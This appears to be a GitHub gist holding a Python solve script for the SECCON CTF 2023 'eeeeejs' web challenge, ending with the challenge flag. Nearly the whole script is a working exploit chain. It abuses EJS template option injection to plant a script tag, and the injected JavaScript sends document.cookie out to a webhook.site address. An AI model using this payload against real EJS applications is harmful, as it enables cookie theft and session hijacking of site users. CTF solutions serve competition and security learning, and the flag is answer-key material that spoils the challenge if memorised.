@lebr0nli
Last active September 18, 2023 00:32
SECCON CTF 2023 Quals - eeeeejs (Web)
from urllib.parse import urlencode
HOST = "http://eeeeejs.seccon.games:3000/"
HOST = "http://localhost:3000/"
HOST = "http://web:3000/"
def html_encode(s):
    # Encode every character as a hexadecimal HTML character reference (&#x..;).
    return "".join(["&#x" + hex(ord(c))[2:] + ";" for c in s])
payload = {
    "cache": "x",
    "filename": "render.dist.js",
    "direc": """
"xxxxxx":"x"}};}});
location=`https://webhook.site/4f37728c-5479-4e68-800b-1bebc7faecec/?f=`+encodeURIComponent(document.cookie);
({"x"(exports,module2){module2.exports={xxxxx:{"yyyy
""".strip(),
    "settings[view options][openDelimiter]": ' "gi',
    "settings[view options][delimiter]": "t",
    "settings[view options][closeDelimiter]": "ory-deploy",
}
payload = urlencode(payload)
payload = {
    "cache": "x",
    "debug": "1",
    "filename[href]": "a",
    f"filename[<script src='/?{html_encode(payload)}'></script>]": "x",
    "filename[origin]": "x",
    "filename[protocol]": "file:",
    "filename[hostname]": "",
    "filename[pathname]": "index.ejs",
}
payload = urlencode(payload)
payload = HOST + "?" + payload
print(payload)
# FLAG=SECCON{RCE_is_po55ible_if_mitigation_4_does_not_exist}